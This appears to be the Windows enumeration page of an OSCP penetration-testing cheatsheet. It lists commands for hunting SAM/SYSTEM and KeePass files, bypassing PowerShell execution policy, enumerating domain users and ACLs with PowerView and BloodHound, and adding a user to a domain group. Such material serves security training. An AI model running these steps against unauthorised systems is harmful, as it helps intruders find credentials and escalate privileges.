OSCP Cheatsheet
  • Reference List
  • Basic
  • Methodology
    • Basic Scans
    • Service Enumeration
      • TCP: HTTP(S) - 80 / 443
      • TCP: SMB - 139 / 445
      • TCP: FTP - 21
      • TCP/UDP: DNS - 53
      • TCP: SSH - 22
      • TCP/UDP: LDAP - 389 / 636 / 3268
      • TCP/UDP: Kerberos - 88
      • UDP: SNMP - 161
      • TCP: SMTP - 25
      • TCP: RDP - 3389
      • TCP: RPC - 135 / 593
      • TCP: Evil-WinRM - 5985 / 5986
      • TCP: MYSQL - 3306
      • TCP: MSSQL - 1433
      • TCP: Confluence - 8090
    • Extras
  • File Transfer
  • KeePass Database
  • Shells
  • Enumeration
    • Linux
    • Windows
    • Git
  • Privilege Escalation
    • Linux
      • Abusing Cron Jobs
      • Abusing Password Authentication
      • Abusing Setuid Binaries and Capabilities
      • Abusing Sudo
      • Exploits
    • Windows
      • Service Binary Hijacking
      • DLL Hijacking
      • Unquoted Service Paths
      • Scheduled Tasks
      • Exploits
  • Port Forwarding
    • Linux
    • Windows
  • Attacks
    • Public Exploits
    • User Creation
    • Password Cracking
      • Custom Rules
      • Custom Password List
    • Phishing
    • SQLi
  • Active Directory
    • Enumeration
    • Attack
    • Lateral Movement
    • Persistence
Powered by GitBook
On this page
  • Interesting Files
  • User Permissions
  • User Enumeration
  • System Enumeration
  • Installed programs
  • Web Root Directory
  • Get History
  • PowerView
  • BloodHound
  1. Enumeration

Windows

PreviousLinuxNextGit

Last updated 2 hours ago

NOTE:

  • Username and hostname

  • Group memberships of the current user

  • Existing users and groups

  • Operating system, version and architecture

  • Network information

  • Installed applications

  • Running processes

Interesting Files

To search for files

where /r C:\Users\ *.txt
where /r C:\ *.uac
where /r C:\ *.dll

dir C:\

where /r C:\ local.txt proof.txt

# Display hidden files
dir \a

To find specific files

Get-ChildItem -Path C:\Users -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx,*ini,*.log,*.ps1 -File -Recurse -ErrorAction SilentlyContinue
	
Get-ChildItem -Path C:\Users -Include *.txt,*.pdf,*.kdbx -File -Recurse -ErrorAction SilentlyContinue
	
Get-ChildItem -Path C:\ -Include SAM,SYSTEM -File -Recurse -ErrorAction SilentlyContinue
	
Get-ChildItem -Path C:\ -Include local.txt,proof.txt -File -Recurse -ErrorAction SilentlyContinue

# Display hidden files
ls -Force

User Permissions

Username

whoami

User information

whoami /all

NOTE: The above command consists of the following

whoami /user
whoami /priv
whoami /groups

User Enumeration

Get all user in the current machine

net user [/domain]
Get-LocalUser

Get information on a particular user

net user <Username> [/domain]

Get groups on domain

net group [/domain]
Get-LocalGroup

Get users in a particular group

Get-LocalGroupMember "<Group Name>"

Get information on a particular group in the domain

net group <Group Name> /domain

Get local administrators

net localgroup administrators

Get SMB shares

net share

Get password requirements

net accounts
Script
notepad "<Path/to/script.ps1>"
function LDAPSearch {
    param (
        [string]$LDAPQuery
    )

    $PDC = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().PdcRoleOwner.Name
    $DistinguishedName = ([adsi]'').distinguishedName

    $DirectoryEntry = New-Object System.DirectoryServices.DirectoryEntry("LDAP://$PDC/$DistinguishedName")

    $DirectorySearcher = New-Object System.DirectoryServices.DirectorySearcher($DirectoryEntry, $LDAPQuery)

    return $DirectorySearcher.FindAll()

}

Load the module into powershell

Import-Module .\script.ps1

To enumeration users

LDAPSearch -LDAPQuery "(samAccountType=805306368)"

To enumerate groups

LDAPSearch -LDAPQuery "(objectclass=group)"

To display members of each group

foreach ($group in $(LDAPSearch -LDAPQuery "(objectCategory=group)")) {$group.properties | select {$_.cn}, {$_.member}}

To display detailed members of a particular group

$group = LDAPSearch -LDAPQuery "(&(objectCategory=group)(cn=<Group Name>))"
$group.properties.member

To display detailed information of a particular member

$user = LDAPSearch -LDAPQuery "(&(objectCategory=user)(cn=<Username>))"
$user.properties

System Enumeration

Get important information

systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type" /C:"Domain" /C:"Network Card"

Get port information

netstat -ano

Get network information

ipconfig /all

Get current console

(dir 2>&1 *`|echo CMD);&<# rem #>echo PowerShell

Installed programs

Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname

Web Root Directory

dir C:\inetpub\wwwroot
dir C:\xampp\htdocs
dir C:\<Directory Name>\xampp\htdocs

NOTE: Indication of Web Director:

  • .htaccess

  • public.html

  • www

  • htdocs

  • httpdcos

Get History

Get-History
(Get-PSReadlineOption).HistorySavePath

PowerView

NOTE: Remember to run the following

  • powershell -ep bypass

  • Import-Module .\PowerView.ps1

Enumerate Users in the Domain

Get-NetUser

To get filtered result

Get-NetUser | select <Field Name> ...

EXAMPLE:

Get-NetUser | select samaccountname, cn, pwdlastset, lastlogon

To get specific information of a particular user

Get-NetUser <Username>

Enumerate Groups in the Domain

Get-NetGroup

To get filtered result

Get-NetGroup | select <Field name> ...

EXAMPLE:

Get-NetGroup | select cn

To get specific information of a particular group

Get-NetGroup <Group Name>

Get SPN users

Get-NetUser -SPN | select <Field name> ...

EXAMPLE:

Get-NetUser -SPN | select samaccountname, serviceprincipalname

Enumerate Computers in the Domain

Get-NetComputer

To get filtered result

Get-NetComputer | select <Field name> ...

EXAMPLE:

Get-NetComputer | select operatingsystem, dnshostname

To get specific information of a particular computer

Get-NetComputer <DNS Host Name>

To look for administrative rights on other computer for the current user

Find-LocalAdminAccess

To look for logged on users on target machine

Get-NetSession -ComputerName <Computer Name> -Verbose

NOTE: If something is not right check for permission.

Permissions for NetSessionEnum are defined in SrvsvcSessionInfo registry key (HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity)

Alternatives

C:\Tools\PSTools\PsLoggedon.exe \\<Host Name>

NOTE: Remote machine must have Remote Registry service enabled

To check for permission

Get-Acl -Path <Registery Hive>:<Registry Path> | fl

EXAMPLE:

Get-Acl -Path HKLM:SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity\ | fl

To enumerate Service Principal Name

Get-NetUser -SPN | select samaccountname, serviceprincipalname

To enumerate ACEs

Get-ObjectAcl -Identity "<Username | Group Name>"

NOTE: Look out for ActiveDirectoryRights and SecurityIdentifier

To enumerate interesting ACL

Find-InterestingDomainAcl | select identityreferencename,activedirectoryrights,acetype,objectdn | ?{$_.IdentityReferenceName -NotContains "DnsAdmins"} | ft

To enumerate all user that has ActiveDirectoryRights = GenericAll under a group

Get-ObjectAcl -Identity "<Group Name>" | ? {$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier, ActiveDirectoryRights

To enumerate all ActiveDirectoryRights = GenericWrite under a group

Get-ObjectAcl -Identity "<Group Name>" | ?{$_.ActiveDirectoryRights -eq "GenericWrite"} | select SecurityIdentifier, ActiveDirectoryRights

To convert SID to Name in bulk

"<SID>", "<SID>", "<SID>", "<SID>", "<SID>" | Convert-SidToName

To convert SID to Name individually

Convert-SidToName "<SID>"

Add user into group in domain

net group "<Group Name>" <Username> /add /domain

To enumerate all shares on Domain

Find-DomainShare

To enumerate shares available to current user

Find-DomainShare -CheckShareAccess

BloodHound

To import BloodHound

Import-Module C:\Tools\Bloodhound.ps1

To begin enumerationg on BloodHound

Invoke-BloodHound -CollectionMethod All -OutputDirectory <Path> -OutputPrefix "corp audit"

On kali:

sudo neo4j start

NOTE: Head over to http://localhost:7474

Username: neo4j

Password: arctic-iris-zipper-prism-courage-7161

WADComs
Logo